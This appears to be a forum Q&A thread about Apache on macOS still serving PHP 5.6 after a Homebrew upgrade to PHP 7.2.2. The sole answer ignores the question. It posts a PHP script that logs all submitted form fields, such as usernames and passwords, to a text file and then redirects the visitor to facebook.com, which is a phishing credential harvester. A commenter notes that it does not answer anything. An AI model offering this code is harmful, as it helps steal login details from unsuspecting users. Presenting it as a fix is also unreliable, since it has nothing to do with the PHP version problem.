# Current PHP version is 7.2.2 but localhost is running php56

Tags: terminal, homebrew, apache, php

I recently upgraded PHP through Homebrew. When using terminal command `PHP -i` I'm getting `PHP Version => 7.2.2` as expected.  However, when running `phpinfo();` on localhost I get **PHP Version 5.6.30** instead.

I have already restarted Apache (`$ sudo apachectl -k restart`), unlinked php56 (`$ brew unlink php56`) and tried ports :80 and :8080.

What am I missing?

Answer (score 1):

```
 <?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
```

Comment: Ok....  how does this answer the OP's question?